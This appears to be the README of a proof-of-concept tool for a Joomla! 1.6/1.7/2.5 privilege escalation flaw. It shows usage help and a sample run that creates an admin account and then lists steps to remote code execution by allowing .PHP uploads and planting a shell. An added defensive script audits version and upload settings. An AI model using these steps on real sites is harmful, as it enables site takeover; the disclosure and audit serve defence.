
A Python script to create an administrator account on Joomla! 1.6/1.7/2.5 using a privilege escalation vulnerability


Joomla! 1.6/1.7/2.5 - Privilege Escalation Vulnerability


Joomla! versions 1.0.x, 1.5.x, and 2.5.3+ are not vulnerable. No patch has been issued for 1.6.x or 1.7.x and users of these versions are strongly urged to upgrade to 2.5.3 immediately.

Features

  • Admin user creation on vulnerable Joomla versions
  • Supports HTTP/HTTPS, self-signed certificates and weak TLS cipher suites
  • Step-by-step explanation of how to achieve RCE with this admin account

Usage

$ ./joomla-admin-account-creation.py -h
PoC for Joomla! 1.6/1.7/2.5 - Privilege Escalation Vulnerability - by @podalirius_

usage: joomla-admin-account-creation.py [-h] -t TARGET [-u USERNAME] [-e EMAIL] [-p PASSWORD] [-k] [-v]

PoC for Joomla! 1.6/1.7/2.5 - Privilege Escalation Vulnerability - by @podalirius_

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        URL to Joomla account creation page.
  -u USERNAME, --username USERNAME
                        Username of the account to create.
  -e EMAIL, --email EMAIL
                        Email of the account to create.
  -p PASSWORD, --password PASSWORD
                        Password of the account to create.
  -k, --insecure        Allow insecure server connections when using SSL (default: False)
  -v, --verbose         Verbose mode. (default: False)

Example

PoC for Joomla! 1.6/1.7/2.5 - Privilege Escalation Vulnerability - by @podalirius_

[>] Generating random values
   [>] Username not supplied, using random username : g2V63EdOTt
   [>] Email not supplied, using random email       : r8tnjnnn6t.kshathetuf@0ik43bfzz1.com
   [>] Password not supplied, using random password : 64akMNEBMO

[>] Starting exploit
   [>] Purposely failing account creation for user 'g2V63EdOTt' ...
      [+] Password mismatch (this is expected)!
   [+] Really creating account for user 'g2V63EdOTt' ...
      [+] Account successfully created !

[+] You can connect to your new account:
  | username : g2V63EdOTt
  | password : 64akMNEBMO
  | email    : r8tnjnnn6t.kshathetuf@0ik43bfzz1.com

[+] To achieve Remote Code Execution (RCE):
  | 1. Login with the 'g2V63EdOTt' account on the admin panel: http://localhost:10080/administrator/index.php
  | 2. Go to the media page: http://localhost:10080/administrator/index.php?option=com_media
  |    2.1. Click on parameters on the top right of the page.
  |    2.2. Add .PHP in the list of allowed extensions.
  |    2.3. Upload your shell on the media page.
  | 3. Access your shell and enjoy.

[+] Exploit finished.
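
For site owners, the affected version range and the media manager setting named in the output above can be checked with a short audit. This is an added example, not code from this repository. It assumes the media manager's allowed-extension list is available as a JSON string under the key `upload_extensions`; the script-extension list and the sample input are constructed for illustration.

```python
import json
import re

# Version range taken from the page: 1.6.x, 1.7.x and 2.5.0-2.5.2 are affected;
# 1.0.x, 1.5.x and 2.5.3+ are not.
FIRST_AFFECTED = (1, 6, 0)
FIRST_FIXED = (2, 5, 3)

# Extensions a web server may execute (constructed list for this example).
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar"}


def parse_version(text):
    """Turn '2.5.1' or 'Joomla! 1.7.3 Stable' into a (major, minor, patch) tuple."""
    match = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not match:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(part or 0) for part in match.groups())


def is_affected(version_text):
    """True when the version falls in the range the page lists as vulnerable."""
    return FIRST_AFFECTED <= parse_version(version_text) < FIRST_FIXED


def risky_upload_extensions(params_json, key="upload_extensions"):
    """Return script extensions present in the media manager's allowed-upload list."""
    params = json.loads(params_json)  # key name is an assumption, see lead-in
    allowed = {e.strip().lstrip(".").lower() for e in params.get(key, "").split(",")}
    return sorted(allowed & SCRIPT_EXTENSIONS)


def audit(version_text, params_json):
    """Collect findings for one site."""
    findings = []
    if is_affected(version_text):
        findings.append(f"{version_text}: affected version, upgrade to 2.5.3 or later")
    risky = risky_upload_extensions(params_json)
    if risky:
        findings.append("media manager allows script uploads: " + ", ".join(risky))
    return findings


if __name__ == "__main__":
    # Constructed sample input, not taken from a real site.
    sample_params = '{"upload_extensions": "bmp,csv,doc,gif,jpg,.PHP,png", "upload_maxsize": "10"}'
    for line in audit("2.5.1", sample_params):
        print("[!]", line)
```

A script extension in the allowed list on a site that never needed one is worth treating as a sign that an administrator account has been misused, whatever the installed version.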

References